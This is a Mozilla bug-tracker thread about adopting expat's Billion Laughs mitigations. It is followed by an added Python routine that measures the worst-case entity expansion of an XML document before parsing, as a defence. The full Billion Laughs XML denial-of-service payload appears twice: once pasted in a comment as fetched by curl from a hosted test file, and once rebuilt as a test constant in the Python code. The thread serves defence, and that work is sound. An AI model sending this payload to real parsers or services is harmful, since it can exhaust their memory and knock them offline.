Open Bug 1713841 Opened 3 years ago Updated 3 months ago

Investigate new Billion Laughs mitigations in expat

Categories

(Core :: XML, enhancement)

People

(Reporter: tjr, Unassigned)

(Keywords: sec-want)

Expat released a new version with improved mitigations for the Billion Laughs attack.

https://github.com/libexpat/libexpat/blob/R_2_4_0/expat/Changes

This bug is to determine if we need these improvements (and if so, to land them).

Peter, is this you?

Flags: needinfo?(peterv)
Group: core-security → dom-core-security

Looks like we have bug 151380 filed as a general bug on this attack on XML.

Keywords: sec-want

With bug 151380 public and the announcement of this fix public, hiding this bug will only catch us some dupes.

Group: dom-core-security

Is disabling entity expansion in the Firefox XML interpreter conditional on whether it's an XHTML document? Then indeed, it is difficult to figure out if entities need expansion according to the XHTML spec or if they are part of a malicious denial-of-service payload.

The expansion still occurs both in Firefox and Chrome.

$ curl -isS https://unhack.ca/billion-laughs-attack.xml
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 21:42:39 GMT
Server: Apache/2.4.52 (Debian)
Last-Modified: Wed, 19 Jan 2022 21:40:52 GMT
ETag: "32a-5d5f63d6c7d41"
Accept-Ranges: bytes
Content-Length: 810
Vary: Accept-Encoding
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>

(In reply to Ilguiz Latypov from comment #3)
> Is disabling entity expansion in the Firefox XML interpreter conditional on whether it's an XHTML document? Then indeed, it is difficult to figure out if entities need expansion according to the XHTML spec or if they are part of a malicious denial-of-service payload.
>
> The expansion still occurs both in Firefox and Chrome.

Forgot to paste the bottom of the curl output:

<lolz>&lol9;</lolz>

Let me know if we should give it a high priority.

Flags: needinfo?(peterv)
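For reference, an added defender-side check (not code from this bug, from Firefox or from expat) that sizes the worst-case expansion of the internal general entities at the end of the DOCTYPE, using only the stdlib expat binding, so a document like the one quoted above is rejected before expat expands anything in element content or attribute values. The ratio it computes (largest single entity expansion over document length) is a lower bound on the amplification expat 2.4 tracks; the `max_factor` default of 100 and the sample payload rebuilt from the curl output are assumptions of this example.

```python
import re
import xml.parsers.expat as expat
ENTITY_REF = re.compile(r"&([^&;#\s]+);")   # general entity refs; &#...; char refs are already resolved

class AmplificationError(ValueError):
    """Worst-case entity expansion exceeds the allowed amplification factor."""

def expanded_size(name, decls, memo, stack):
    """Bytes a full expansion of entity `name` would produce, computed from the
    declarations alone (nothing is expanded); a reference cycle counts as infinite."""
    if name in memo:
        return memo[name]
    if name not in decls:               # external or predefined entity: the reference text stays
        return len(name) + 2
    if name in stack:
        return float("inf")
    stack.add(name)
    total = len(ENTITY_REF.sub("", decls[name]))        # literal characters of the replacement text
    for ref in ENTITY_REF.findall(decls[name]):
        total += expanded_size(ref, decls, memo, stack)
    stack.discard(name)
    memo[name] = total
    return total

def worst_case_bytes(decls):
    """Largest expansion among the declared internal general entities."""
    memo = {}
    return max((expanded_size(n, decls, memo, set()) for n in decls), default=0)

def check_amplification(xml_bytes, max_factor=100):
    """Return worst_case_bytes / len(document). Raises at ']>', before expat expands
    anything in content or attribute values, when the ratio exceeds max_factor."""
    decls, seen = {}, {}
    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if not is_param and value is not None:          # internal general entities only
            decls[name] = value
    def end_doctype():
        seen["factor"] = worst_case_bytes(decls) / max(len(xml_bytes), 1)
        if seen["factor"] > max_factor:
            raise AmplificationError(f"expansion factor {seen['factor']:.3g} > {max_factor}")
    parser = expat.ParserCreate()
    parser.EntityDeclHandler = entity_decl
    parser.EndDoctypeDeclHandler = end_doctype
    parser.Parse(xml_bytes, True)       # an exception raised in a handler propagates out of Parse
    return seen.get("factor", 0.0)

# Constructed sample: rebuilds the payload quoted in the comments above (lol .. lol9, 10x each).
_ENTS = ' <!ENTITY lol "lol">\n <!ELEMENT lolz (#PCDATA)>\n' + "".join(
    ' <!ENTITY lol%d "%s">\n' % (i, ("&lol%s;" % (i - 1 if i > 1 else "")) * 10)
    for i in range(1, 10))
BILLION_LAUGHS = ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + _ENTS + ']>\n<lolz>&lol9;</lolz>\n').encode()
```

Calling `check_amplification(BILLION_LAUGHS)` raises `AmplificationError` at the `]>` with a factor in the millions (lol9 alone is 3 x 10^9 bytes against an input of under a kilobyte), while a document whose entities expand to less than their own declarations parses normally and returns a factor below 1.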